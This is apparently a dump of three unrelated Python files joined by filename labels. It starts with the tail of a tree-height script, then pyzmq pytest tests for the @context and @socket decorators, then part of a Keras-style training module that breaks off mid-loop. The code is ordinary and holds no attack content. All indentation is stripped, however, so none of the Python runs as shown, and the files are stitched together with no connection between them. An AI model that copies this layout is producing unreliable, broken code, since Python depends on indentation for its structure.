heights = [0] * len(self.parent)
for vertex in range(self.n):
if (heights[vertex] != 0):
continue
height = 0
i = vertex
while i != -1:
if (heights[i] != 0):
height += heights[i]
break
height += 1
i = self.parent[i]
maxHeight = max(maxHeight, height)
i = vertex
while i != -1:
if (heights[i] != 0):
break
heights[i] = height
height -= 1
i = self.parent[i]
return (maxHeight)
def main():
tree = TreeHeight()
tree.read()
print(tree.compute_height())
threading.Thread(target=main).start()
@ CODED BY TSG405, 2021
|
test_decorators.py | import threading
from pytest import fixture, raises
import zmq
from zmq.decorators import context, socket
from zmq.tests import BaseZMQTestCase, term_context
##############################################
# Test cases for @context
##############################################
@fixture(autouse=True)
def term_context_instance(request):
request.addfinalizer(lambda: term_context(zmq.Context.instance(), timeout=10))
def test_ctx():
@context()
def test(ctx):
assert isinstance(ctx, zmq.Context), ctx
test()
def test_ctx_orig_args():
@context()
def f(foo, bar, ctx, baz=None):
assert isinstance(ctx, zmq.Context), ctx
assert foo == 42
assert bar is True
assert baz == 'mock'
f(42, True, baz='mock')
def test_ctx_arg_naming():
@context('myctx')
def test(myctx):
assert isinstance(myctx, zmq.Context), myctx
test()
def test_ctx_args():
@context('ctx', 5)
def test(ctx):
assert isinstance(ctx, zmq.Context), ctx
assert ctx.IO_THREADS == 5, ctx.IO_THREADS
test()
def test_ctx_arg_kwarg():
@context('ctx', io_threads=5)
def test(ctx):
assert isinstance(ctx, zmq.Context), ctx
assert ctx.IO_THREADS == 5, ctx.IO_THREADS
test()
def test_ctx_kw_naming():
@context(name='myctx')
def test(myctx):
assert isinstance(myctx, zmq.Context), myctx
test()
def test_ctx_kwargs():
@context(name='ctx', io_threads=5)
def test(ctx):
assert isinstance(ctx, zmq.Context), ctx
assert ctx.IO_THREADS == 5, ctx.IO_THREADS
test()
def test_ctx_kwargs_default():
@context(name='ctx', io_threads=5)
def test(ctx=None):
assert isinstance(ctx, zmq.Context), ctx
assert ctx.IO_THREADS == 5, ctx.IO_THREADS
test()
def test_ctx_keyword_miss():
@context(name='ctx')
def test(other_name):
pass # the keyword ``ctx`` not found
with raises(TypeError):
test()
def test_ctx_multi_assign():
@context(name='ctx')
def test(ctx):
pass # explosion
with raises(TypeError):
test('mock')
def test_ctx_reinit():
result = {'foo': None, 'bar': None}
@context()
def f(key, ctx):
assert isinstance(ctx, zmq.Context), ctx
result[key] = ctx
foo_t = threading.Thread(target=f, args=('foo',))
bar_t = threading.Thread(target=f, args=('bar',))
foo_t.start()
bar_t.start()
foo_t.join()
bar_t.join()
assert result['foo'] is not None, result
assert result['bar'] is not None, result
assert result['foo'] is not result['bar'], result
def test_ctx_multi_thread():
@context()
@context()
def f(foo, bar):
assert isinstance(foo, zmq.Context), foo
assert isinstance(bar, zmq.Context), bar
assert len(set(map(id, [foo, bar]))) == 2, set(map(id, [foo, bar]))
threads = [threading.Thread(target=f) for i in range(8)]
[t.start() for t in threads]
[t.join() for t in threads]
##############################################
# Test cases for @socket
##############################################
def test_ctx_skt():
@context()
@socket(zmq.PUB)
def test(ctx, skt):
assert isinstance(ctx, zmq.Context), ctx
assert isinstance(skt, zmq.Socket), skt
assert skt.type == zmq.PUB
test()
def test_skt_name():
@context()
@socket('myskt', zmq.PUB)
def test(ctx, myskt):
assert isinstance(myskt, zmq.Socket), myskt
assert isinstance(ctx, zmq.Context), ctx
assert myskt.type == zmq.PUB
test()
def test_skt_kwarg():
@context()
@socket(zmq.PUB, name='myskt')
def test(ctx, myskt):
assert isinstance(myskt, zmq.Socket), myskt
assert isinstance(ctx, zmq.Context), ctx
assert myskt.type == zmq.PUB
test()
def test_ctx_skt_name():
@context('ctx')
@socket('skt', zmq.PUB, context_name='ctx')
def test(ctx, skt):
assert isinstance(skt, zmq.Socket), skt
assert isinstance(ctx, zmq.Context), ctx
assert skt.type == zmq.PUB
test()
def test_skt_default_ctx():
@socket(zmq.PUB)
def test(skt):
assert isinstance(skt, zmq.Socket), skt
assert skt.context is zmq.Context.instance()
assert skt.type == zmq.PUB
test()
def test_skt_reinit():
result = {'foo': None, 'bar': None}
@socket(zmq.PUB)
def f(key, skt):
assert isinstance(skt, zmq.Socket), skt
result[key] = skt
foo_t = threading.Thread(target=f, args=('foo',))
bar_t = threading.Thread(target=f, args=('bar',))
foo_t.start()
bar_t.start()
foo_t.join()
bar_t.join()
assert result['foo'] is not None, result
assert result['bar'] is not None, result
assert result['foo'] is not result['bar'], result
def test_ctx_skt_reinit():
result = {'foo': {'ctx': None, 'skt': None}, 'bar': {'ctx': None, 'skt': None}}
@context()
@socket(zmq.PUB)
def f(key, ctx, skt):
assert isinstance(ctx, zmq.Context), ctx
assert isinstance(skt, zmq.Socket), skt
result[key]['ctx'] = ctx
result[key]['skt'] = skt
foo_t = threading.Thread(target=f, args=('foo',))
bar_t = threading.Thread(target=f, args=('bar',))
foo_t.start()
bar_t.start()
foo_t.join()
bar_t.join()
assert result['foo']['ctx'] is not None, result
assert result['foo']['skt'] is not None, result
assert result['bar']['ctx'] is not None, result
assert result['bar']['skt'] is not None, result
assert result['foo']['ctx'] is not result['bar']['ctx'], result
assert result['foo']['skt'] is not result['bar']['skt'], result
def test_skt_type_miss():
@context()
@socket('myskt')
def f(ctx, myskt):
pass # the socket type is missing
with raises(TypeError):
f()
def test_multi_skts():
@socket(zmq.PUB)
@socket(zmq.SUB)
@socket(zmq.PUSH)
def test(pub, sub, push):
assert isinstance(pub, zmq.Socket), pub
assert isinstance(sub, zmq.Socket), sub
assert isinstance(push, zmq.Socket), push
assert pub.context is zmq.Context.instance()
assert sub.context is zmq.Context.instance()
assert push.context is zmq.Context.instance()
assert pub.type == zmq.PUB
assert sub.type == zmq.SUB
assert push.type == zmq.PUSH
test()
def test_multi_skts_single_ctx():
@context()
@socket(zmq.PUB)
@socket(zmq.SUB)
@socket(zmq.PUSH)
def test(ctx, pub, sub, push):
assert isinstance(ctx, zmq.Context), ctx
assert isinstance(pub, zmq.Socket), pub
assert isinstance(sub, zmq.Socket), sub
assert isinstance(push, zmq.Socket), push
assert pub.context is ctx
assert sub.context is ctx
assert push.context is ctx
assert pub.type == zmq.PUB
assert sub.type == zmq.SUB
assert push.type == zmq.PUSH
test()
def test_multi_skts_with_name():
@socket('foo', zmq.PUSH)
@socket('bar', zmq.SUB)
@socket('baz', zmq.PUB)
def test(foo, bar, baz):
assert isinstance(foo, zmq.Socket), foo
assert isinstance(bar, zmq.Socket), bar
assert isinstance(baz, zmq.Socket), baz
assert foo.context is zmq.Context.instance()
assert bar.context is zmq.Context.instance()
assert baz.context is zmq.Context.instance()
assert foo.type == zmq.PUSH
assert bar.type == zmq.SUB
assert baz.type == zmq.PUB
test()
def test_func_return():
@context()
def f(ctx):
assert isinstance(ctx, zmq.Context), ctx
return 'something'
assert f() == 'something'
def test_skt_multi_thread():
@socket(zmq.PUB)
@socket(zmq.SUB)
@socket(zmq.PUSH)
def f(pub, sub, push):
assert isinstance(pub, zmq.Socket), pub
assert isinstance(sub, zmq.Socket), sub
assert isinstance(push, zmq.Socket), push
assert pub.context is zmq.Context.instance()
assert sub.context is zmq.Context.instance()
assert push.context is zmq.Context.instance()
assert pub.type == zmq.PUB
assert sub.type == zmq.SUB
assert push.type == zmq.PUSH
assert len(set(map(id, [pub, sub, push]))) == 3
threads = [threading.Thread(target=f) for i in range(8)]
[t.start() for t in threads]
[t.join() for t in threads]
class TestMethodDecorators(BaseZMQTestCase):
@context()
@socket(zmq.PUB)
@socket(zmq.SUB)
def multi_skts_method(self, ctx, pub, sub, foo='bar'):
assert isinstance(self, TestMethodDecorators), self
assert isinstance(ctx, zmq.Context), ctx
assert isinstance(pub, zmq.Socket), pub
assert isinstance(sub, zmq.Socket), sub
assert foo == 'bar'
assert pub.context is ctx
assert sub.context is ctx
assert pub.type == zmq.PUB
assert sub.type == zmq.SUB
def test_multi_skts_method(self):
self.multi_skts_method()
def test_multi_skts_method_other_args(self):
@socket(zmq.PUB)
@socket(zmq.SUB)
def f(foo, pub, sub, bar=None):
assert isinstance(pub, zmq.Socket), pub
assert isinstance(sub, zmq.Socket), sub
assert foo == 'mock'
assert bar == 'fake'
assert pub.context is zmq.Context.instance()
assert sub.context is zmq.Context.instance()
assert pub.type == zmq.PUB
assert sub.type == zmq.SUB
f('mock', bar='fake')
|
training.py | from __future__ import print_function
from __future__ import absolute_import
import warnings
import copy
import time
import numpy as np
import multiprocessing
import threading
try:
import queue
except ImportError:
import Queue as queue
from .topology import Container
from .. import backend as K
from .. import optimizers
from .. import objectives
from .. import metrics as metrics_module
from ..utils.generic_utils import Progbar
from .. import callbacks as cbks
def standardize_input_data(data, names, shapes=None,
check_batch_dim=True,
exception_prefix=''):
'''Users may pass data as a list of arrays, dictionary of arrays,
or as a single array. We normalize this to an ordered list of
arrays (same order as `names`), while checking that the provided
arrays have shapes that match the network's expectations.
'''
if type(data) is dict:
arrays = []
for name in names:
if name not in data:
raise Exception('No data provided for "' +
name + '". Need data for each key in: ' +
str(data.keys()))
arrays.append(data[name])
elif type(data) is list:
if len(data) != len(names):
if len(data) > 0 and hasattr(data[0], 'shape'):
raise Exception('Error when checking ' + exception_prefix +
': the list of Numpy arrays '
'that you are passing to your model '
'is not the size the model expected. '
'Expected to see ' + str(len(names)) +
' arrays but instead got '
'the following list of ' + str(len(data)) +
' arrays: ' + str(data)[:200] +
'...')
else:
if len(names) == 1:
data = [np.asarray(data)]
else:
raise Exception('Error when checking ' + exception_prefix +
': you are passing a list as '
'input to your model, '
'but the model expects '
'a list of ' + str(len(names)) +
' Numpy arrays instead. '
'The list you passed was: ' +
str(data)[:200])
arrays = data
else:
if not hasattr(data, 'shape'):
raise Exception('Error when checking ' + exception_prefix +
': data should be a Numpy array, '
'or list/dict of Numpy arrays. '
'Found: ' + str(data)[:200] + '...')
if len(names) != 1:
# case: model expects multiple inputs but only received
# a single Numpy array
raise Exception('The model expects ' + str(len(names)) +
' input arrays, but only received one array. '
'Found: array with shape ' + str(data.shape))
arrays = [data]
# make arrays at least 2D
for i in range(len(names)):
array = arrays[i]
if len(array.shape) == 1:
array = np.expand_dims(array, 1)
arrays[i] = array
# check shapes compatibility
if shapes:
for i in range(len(names)):
if shapes[i] is None:
continue
array = arrays[i]
if len(array.shape) != len(shapes[i]):
raise Exception('Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have ' + str(len(shapes[i])) +
' dimensions, but got array with shape ' +
str(array.shape))
for j, (dim, ref_dim) in enumerate(zip(array.shape, shapes[i])):
if not j and not check_batch_dim:
# skip the first axis
continue
if ref_dim:
if ref_dim != dim:
raise Exception('Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have shape ' + str(shapes[i]) +
' but got array with shape ' +
str(array.shape))
return arrays
def standardize_sample_or_class_weights(x_weight, output_names, weight_type):
if x_weight is None or len(x_weight) == 0:
return [None for _ in output_names]
if len(output_names) == 1:
if type(x_weight) is list and len(x_weight) == 1:
return x_weight
if type(x_weight) is dict and output_names[0] in x_weight:
return [x_weight[output_names[0]]]
else:
return [x_weight]
if type(x_weight) is list:
if len(x_weight) != len(output_names):
raise Exception('Provided `' + weight_type + '` was a list of ' +
str(len(x_weight)) +
' elements, but the model has ' +
str(len(output_names)) + ' outputs. '
'You should provide one `' + weight_type + '`'
'array per model output.')
return x_weight
if type(x_weight) is dict:
x_weights = []
for name in output_names:
x_weights.append(x_weight.get(name))
return x_weights
else:
raise Exception('The model has multiple outputs, so `' +
weight_type + '` '
'should be either a list of a dict. '
'Provided `' + weight_type +
'` type not understood: ' +
str(x_weight))
def standardize_class_weights(class_weight, output_names):
return standardize_sample_or_class_weights(class_weight,
output_names,
'class_weight')
def standardize_sample_weights(sample_weight, output_names):
return standardize_sample_or_class_weights(sample_weight,
output_names,
'sample_weight')
def check_array_lengths(X, Y, W):
x_lengths = [x.shape[0] for x in X]
y_lengths = [y.shape[0] for y in Y]
w_lengths = [w.shape[0] for w in W]
set_x = set(x_lengths)
if len(set_x) != 1:
raise Exception('All input arrays (x) should have '
'the same number of samples.')
set_y = set(y_lengths)
if len(set_y) != 1:
raise Exception('All target arrays (y) should have '
'the same number of samples.')
set_w = set(w_lengths)
if len(set_w) != 1:
raise Exception('All sample_weight arrays should have '
'the same number of samples.')
if list(set_x)[0] != list(set_y)[0]:
raise Exception('Input arrays should have '
'the same number of samples as target arrays. Found ' +
str(list(set_x)[0]) + ' input samples and ' +
str(list(set_y)[0]) + ' target samples.')
if list(set_x)[0] != list(set_w)[0]:
raise Exception('Sample_weight arrays should have '
'the same number of samples as input arrays. Found ' +
str(list(set_x)[0]) + ' input samples and ' +
str(list(set_w)[0]) + ' target samples.')
def check_loss_and_target_compatibility(targets, losses, output_shapes):
assert len(targets) == len(losses) == len(output_shapes)
key_losses = {'mean_square_error',
'binary_crossentropy',
'categorical_crossentropy'}
for y, loss, shape in zip(targets, losses, output_shapes):
if loss.__name__ == 'categorical_crossentropy':
if y.shape[1] == 1:
raise Exception('You are passing a target array of shape ' + str(y.shape) +
' while using as loss `categorical_crossentropy`. '
'`categorical_crossentropy` expects '
'targets to be binary matrices (1s and 0s) '
'of shape (samples, classes). '
'If your targets are integer classes, '
'you can convert them to the expected format via:\n'
'```\n'
'from keras.utils.np_utils import to_categorical\n'
'y_binary = to_categorical(y_int)\n'
'```\n'
'\n'
'Alternatively, you can use the loss function '
'`sparse_categorical_crossentropy` instead, '
'which does expect integer targets.')
if loss.__name__ in key_losses and shape[1] is not None and y.shape[1] != shape[1]:
raise Exception('A target array with shape ' + str(y.shape) +
' was passed for an output of shape ' + str(shape) +
' while using as loss `' + loss.__name__ + '`. '
'This loss expects '
'targets to have the same shape '
'as the output.')
def collect_metrics(metrics, output_names):
if not metrics:
return [[] for _ in output_names]
if type(metrics) is list:
# we then apply all metrics to all outputs.
return [copy.copy(metrics) for _ in output_names]
elif type(metrics) is dict:
nested_metrics = []
for name in output_names:
output_metrics = metrics.get(name, [])
if type(output_metrics) is not list:
output_metrics = [output_metrics]
nested_metrics.append(output_metrics)
return nested_metrics
else:
raise Exception('Type of `metrics` argument not understood. '
'Expected a list or dictionary, found: ' +
str(metrics))
def collect_trainable_weights(layer):
'''Collects all `trainable_weights` attributes,
excluding any sublayers where `trainable` is set the `False`.
'''
trainable = getattr(layer, 'trainable', True)
if not trainable:
return []
weights = []
if layer.__class__.__name__ == 'Sequential':
for sublayer in layer.flattened_layers:
weights += collect_trainable_weights(sublayer)
elif layer.__class__.__name__ == 'Model':
for sublayer in layer.layers:
weights += collect_trainable_weights(sublayer)
elif layer.__class__.__name__ == 'Graph':
for sublayer in layer._graph_nodes.values():
weights += collect_trainable_weights(sublayer)
else:
weights += layer.trainable_weights
# dedupe weights
weights = list(set(weights))
weights.sort(key=lambda x: x.name)
return weights
def batch_shuffle(index_array, batch_size):
'''This shuffles an array in a batch-wise fashion.
Useful for shuffling HDF5 arrays
(where one cannot access arbitrary indices).
'''
batch_count = int(len(index_array) / batch_size)
# to reshape we need to be cleanly divisible by batch size
# we stash extra items and reappend them after shuffling
last_batch = index_array[batch_count * batch_size:]
index_array = index_array[:batch_count * batch_size]
index_array = index_array.reshape((batch_count, batch_size))
np.random.shuffle(index_array)
index_array = index_array.flatten()
return np.append(index_array, last_batch)
def make_batches(size, batch_size):
'''Returns a list of batch indices (tuples of indices).
'''
nb_batch = int(np.ceil(size / float(batch_size)))
return [(i * batch_size, min(size, (i + 1) * batch_size))
for i in range(0, nb_batch)]
def slice_X(X, start=None, stop=None):
'''This takes an array-like, or a list of
array-likes, and outputs:
- X[start:stop] if X is an array-like
- [x[start:stop] for x in X] if X in a list
Can also work on list/array of indices: `slice_X(x, indices)`
# Arguments:
start: can be an integer index (start index)
or a list/array of indices
stop: integer (stop index); should be None if
`start` was a list.
'''
if type(X) == list:
if hasattr(start, '__len__'):
# hdf5 datasets only support list objects as indices
if hasattr(start, 'shape'):
start = start.tolist()
return [x[start] for x in X]
else:
return [x[start:stop] for x in X]
else:
if hasattr(start, '__len__'):
if hasattr(start, 'shape'):
start = start.tolist()
return X[start]
else:
return X[start:stop]
def weighted_objective(fn):
'''Transforms an objective function `fn(y_true, y_pred)`
into a sample-weighted, cost-masked objective function
`fn(y_true, y_pred, weights, mask)`.
'''
def weighted(y_true, y_pred, weights, mask=None):
# score_array has ndim >= 2
score_array = fn(y_true, y_pred)
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
mask = K.cast(mask, K.floatx())
# mask should have the same shape as score_array
score_array *= mask
# the loss per batch should be proportional
# to the number of unmasked samples.
score_array /= K.mean(mask)
# reduce score_array to same ndim as weight array
ndim = K.ndim(score_array)
weight_ndim = K.ndim(weights)
score_array = K.mean(score_array, axis=list(range(weight_ndim, ndim)))
# apply sample weighting
if weights is not None:
score_array *= weights
score_array /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))
return K.mean(score_array)
return weighted
def standardize_weights(y, sample_weight=None, class_weight=None,
sample_weight_mode=None):
'''Performs weight input validation and standardization
to a single sample-wise (or timestep-wise) weight array.
'''
if sample_weight_mode is not None:
if sample_weight_mode != 'temporal':
raise Exception('"sample_weight_mode '
'should be None or "temporal". '
'Found: ' + str(sample_weight_mode))
if len(y.shape) < 3:
raise Exception('Found a sample_weight array for '
'an input with shape ' +
str(y.shape) + '. '
'Timestep-wise sample weighting (use of '
'sample_weight_mode="temporal") is restricted to '
'outputs that are at least 3D, i.e. that have '
'a time dimension.')
if sample_weight is not None and len(sample_weight.shape) != 2:
raise Exception('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weighting, '
'you should pass a 2D sample_weight array.')
else:
if sample_weight is not None and len(sample_weight.shape) != 1:
raise Exception('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weights, '
'you should specify sample_weight_mode="temporal" '
'in compile(). If you just mean to use '
'sample-wise weights, make sure your '
'sample_weight array is 1D.')
if sample_weight is not None:
assert len(sample_weight.shape) <= len(y.shape)
# TODO: proper error message
assert y.shape[:sample_weight.ndim] == sample_weight.shape
return sample_weight
elif isinstance(class_weight, dict):
if len(y.shape) > 2:
raise Exception('class_weight not supported for '
'3+ dimensional targets.')
if y.shape[1] > 1:
y_classes = y.argmax(axis=1)
elif y.shape[1] == 1:
y_classes = np.reshape(y, y.shape[0])
else:
y_classes = y
weights = np.asarray([class_weight[cls] for cls in y_classes])
return weights
else:
if sample_weight_mode is None:
return np.ones((y.shape[0],), dtype=K.floatx())
else:
return np.ones((y.shape[0], y.shape[1]), dtype=K.floatx())
def generator_queue(generator, max_q_size=10,
wait_time=0.05, nb_worker=1, pickle_safe=False):
'''Builds a queue out of a data generator.
If pickle_safe, use a multiprocessing approach. Else, use threading.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
'''
generator_threads = []
if pickle_safe:
q = multiprocessing.Queue(maxsize=max_q_size)
_stop = multiprocessing.Event()
else:
q = queue.Queue()
_stop = threading.Event()
try:
def data_generator_task():
while not _stop.is_set():
try:
if pickle_safe or q.qsize() < max_q_size:
generator_output = next(generator)
q.put(generator_output)
else:
time.sleep(wait_time)
except Exception:
_stop.set()
raise
for i in range(nb_worker):
if pickle_safe:
# Reset random seed else all children processes share the same seed
np.random.seed()
thread = multiprocessing.Process(target=data_generator_task)
else:
thread = threading.Thread(target=data_generator_task)
generator_threads.append(thread)
thread.daemon = True
thread.start()
except:
_stop.set()
if pickle_safe:
# Terminate all daemon processes
for p in generator_threads:
if p.is_alive():
p.terminate()
q.close()
raise
return q, _stop
class Model(Container):
def compile(self, optimizer, loss, metrics=[], loss_weights=None,
sample_weight_mode=None, **kwargs):
'''Configures the model for training.
# Arguments
optimizer: str (name of optimizer) or optimizer object.
See [optimizers](/optimizers).
loss: str (name of objective function) or objective function.
See [objectives](/objectives).
If the model has multiple outputs, you can use a different loss
on each output by passing a dictionary or a list of objectives.
metrics: list of metrics to be evaluated by the model
during training and testing.
Typically you will use `metrics=['accuracy']`.
To specify different metrics for different outputs of a
multi-output model, you could also pass a dictionary,
such as `metrics={'output_a': 'accuracy'}`.
sample_weight_mode: if you need to do timestep-wise
sample weighting (2D weights), set this to "temporal".
"None" defaults to sample-wise weights (1D).
If the model has multiple outputs, you can use a different
`sample_weight_mode` on each output by passing a
dictionary or a list of modes.
kwargs: when using the Theano backend, these arguments
are passed into K.function. Ignored for Tensorflow backend.
'''
self.optimizer = optimizers.get(optimizer)
self.sample_weight_mode = sample_weight_mode
self.loss = loss
self.loss_weights = loss_weights
# prepare loss weights
if loss_weights is None:
loss_weights_list = [1. for _ in range(len(self.outputs))]
elif type(loss_weights) is dict:
for name in loss_weights:
if name not in self.output_names:
raise Exception('Unknown entry in loss_weights '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_weights_list = []
for name in self.output_names:
loss_weights_list.append(loss_weights.get(name, 1.))
elif type(loss_weights) is list:
if len(loss_weights) != len(self.outputs):
raise Exception('When passing a list as loss_weights, '
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss_weights=' +
str(loss_weights))
loss_weights_list = loss_weights
else:
raise Exception('Could not interpret loss_weights argument: ' +
str(loss_weights))
# prepare loss functions
if type(loss) is dict:
for name in loss:
if name not in self.output_names:
raise Exception('Unknown entry in loss '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_functions = []
for name in self.output_names:
if name not in loss:
raise Exception('Output "' + name +
'" missing from loss dictionary')
loss_functions.append(objectives.get(loss[name]))
elif type(loss) is list:
if len(loss) != len(self.outputs):
raise Exception('When passing a list as loss, '
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss=' +
str(loss))
loss_functions = [objectives.get(l) for l in loss]
else:
loss_function = objectives.get(loss)
loss_functions = [loss_function for _ in range(len(self.outputs))]
self.loss_functions = loss_functions
weighted_losses = [weighted_objective(fn) for fn in loss_functions]
# prepare output masks
masks = self.compute_mask(self.inputs, mask=None)
if masks is None:
masks = [None for _ in self.outputs]
if type(masks) is not list:
masks = [masks]
# prepare sample weights
if type(sample_weight_mode) is dict:
for name in sample_weight_mode:
if name not in self.output_names:
raise Exception('Unknown entry in '
'sample_weight_mode dictionary: "' +
name + '". '
'Only expected the following keys: ' +
str(self.output_names))
sample_weights = []
sample_weight_modes = []
for name in self.output_names:
if name not in sample_weight_mode:
raise Exception('Output "' + name +
'" missing from sample_weight_modes '
'dictionary')
if sample_weight_mode.get(name) == 'temporal':
weight = K.placeholder(ndim=2, name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1, name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
elif type(sample_weight_mode) is list:
if len(sample_weight_mode) != len(self.outputs):
raise Exception('When passing a list as sample_weight_mode, ' +
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed sample_weight_mode=' +
str(sample_weight_mode))
sample_weights = []
sample_weight_modes = []
for mode, name in zip(sample_weight_mode, self.output_names):
if mode == 'temporal':
weight = K.placeholder(ndim=2, name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1, name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
else:
if sample_weight_mode == 'temporal':
sample_weights = [K.placeholder(ndim=2, name=name + '_sample_weights')
for name in self.output_names]
sample_weight_modes = ['temporal' for name in self.output_names]
else:
sample_weights = [K.placeholder(ndim=1, name=name + '_sample_weights')
for name in self.output_names]
sample_weight_modes = [None for name in self.output_names]
self.sample_weight_modes = sample_weight_modes
# prepare targets of model
self.targets = []
for i in range(len(self.outputs)):
shape = self.internal_output_shapes[i]
name = self.output_names[i]
self.targets.append(K.placeholder(ndim=len(shape), name=name + '_target'))
# prepare metrics
self.metrics = metrics
self.metrics_names = ['loss']
self.metrics_tensors = []
# compute total loss
total_loss = None
for i in range(len(self.outputs)):
y_true = self.targets[i]
y_pred = self.outputs[i]
weighted_loss = weighted_losses[i]
sample_weight = sample_weights[i]
mask = masks[i]
loss_weight = loss_weights_list[i]
output_loss = weighted_loss(y_true, y_pred,
sample_weight, mask)
if len(self.outputs) > 1:
self.metrics_tensors.append(output_loss)
self.metrics_names.append(self.output_names[i] + '_loss')
if total_loss is None:
total_loss = loss_weight * output_loss
else:
total_loss += loss_weight * output_loss
# add regularization penalties to the loss
for r in self.regularizers:
total_loss = r(total_loss)
# list of same size as output_names.
# contains tuples (metrics for output, names of metrics)
nested_metrics = collect_metrics(metrics, self.output_names)
for i in range(len(self.outputs)):
y_true = self.targets[i]
y_pred = self.outputs[i]
output_metrics = nested_metrics[i]
for metric in output_metrics:
if metric == 'accuracy' or metric == 'acc':
# custom handling of accuracy (because of class mode duality)
output_shape = self.internal_output_shapes[i]
if output_shape[-1] == 1 or self.loss_functions[i] == objectives.binary_crossentropy:
# case: binary accuracy
self.metrics_tensors.append(metrics_module.binary_accuracy(y_true, y_pred))
elif self.loss_functions[i] == objectives.sparse_categorical_crossentropy:
# case: categorical accuracy with sparse targets
self.metrics_tensors.append(
metrics_module.sparse_categorical_accuracy(y_true, y_pred))
else:
# case: categorical accuracy with dense targets
self.metrics_tensors.append(metrics_module.categorical_accuracy(y_true, y_pred))
if len(self.output_names) == 1:
self.metrics_names.append('acc')
else:
self.metrics_names.append(self.output_layers[i].name + '_acc')
else:
metric_fn = metrics_module.get(metric)
self.metrics_tensors.append(metric_fn(y_true, y_pred))
if len(self.output_names) == 1:
self.metrics_names.append(metric_fn.__name__)
else:
self.metrics_names.append(self.output_layers[i].name + '_' + metric_fn.__name__)
# prepare gradient updates and state updates
self.optimizer = optimizers.get(optimizer)
self.total_loss = total_loss
self.sample_weights = sample_weights
# functions for train, test and predict will
# be compiled lazily when required.
# This saves time when the user is not using all functions.
self._function_kwargs = kwargs
self.train_function = None
self.test_function = None
self.predict_function = None
self._collected_trainable_weights = collect_trainable_weights(self)
def _make_train_function(self):
if not hasattr(self, 'train_function'):
raise Exception('You must compile your model before using it.')
if self.train_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
training_updates = self.optimizer.get_updates(self._collected_trainable_weights,
self.constraints,
self.total_loss)
updates = self.updates + training_updates
# returns loss and metrics. Updates weights at each call.
self.train_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=updates,
**self._function_kwargs)
def _make_test_function(self):
if not hasattr(self, 'test_function'):
raise Exception('You must compile your model before using it.')
if self.test_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
# return loss and metrics, no gradient updates.
# Does update the network states.
self.test_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=self.state_updates,
**self._function_kwargs)
def _make_predict_function(self):
if not hasattr(self, 'predict_function'):
self.predict_function = None
if self.predict_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + [K.learning_phase()]
else:
inputs = self.inputs
# returns network outputs. Does not update weights.
# Does update the network states.
kwargs = getattr(self, '_function_kwargs', {})
self.predict_function = K.function(inputs,
self.outputs,
updates=self.state_updates,
**kwargs)
def _fit_loop(self, f, ins, out_labels=[], batch_size=32,
nb_epoch=100, verbose=1, callbacks=[],
val_f=None, val_ins=None, shuffle=True,
callback_metrics=[]):
'''Abstract fit function for f(ins).
Assume that f returns a list, labeled by out_labels.
# Arguments
f: Keras function returning a list of tensors
ins: list of tensors to be fed to `f`
out_labels: list of strings, display names of
the outputs of `f`
batch_size: integer batch size
nb_epoch: number of times to iterate over the data
verbose: verbosity mode, 0, 1 or 2
callbacks: list of callbacks to be called during training
val_f: Keras function to call for validation
val_ins: list of tensors to be fed to `val_f`
shuffle: whether to shuffle the data at the beginning of each epoch
callback_metrics: list of strings, the display names of the metrics
passed to the callbacks. They should be the
concatenation of list the display names of the outputs of
`f` and the list of display names of the outputs of `f_val`.
# Returns
`History` object.
'''
do_validation = False
if val_f and val_ins:
do_validation = True
if verbose:
print('Train on %d samples, validate on %d samples' %
(ins[0].shape[0], val_ins[0].shape[0]))
nb_train_sample = ins[0].shape[0]
index_array = np.arange(nb_train_sample)
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self
# (used by Sequential models)
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks._set_model(callback_model)
callbacks._set_params({
'batch_size': batch_size,
'nb_epoch': nb_epoch,
'nb_sample': nb_train_sample,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
callback_model.stop_training = False
self.validation_data = val_ins
for epoch in range(nb_epoch):
callbacks.on_epoch_begin(epoch)
if shuffle == 'batch':
index_array = batch_shuffle(index_array, batch_size)
elif shuffle:
np.random.shuffle(index_array)
batches = make_batches(nb_train_sample, batch_size)
epoch_logs = {}
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
try:
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
except TypeError:
raise Exception('TypeError while preparing batch. '
'If using HDF5 input data, '
'pass shuffle="batch".')
batch_logs = {}
batch_logs['batch'] = batch_index
batch_logs['size'] = len(batch_ids)
callbacks.on_batch_begin(batch_index, batch_logs)
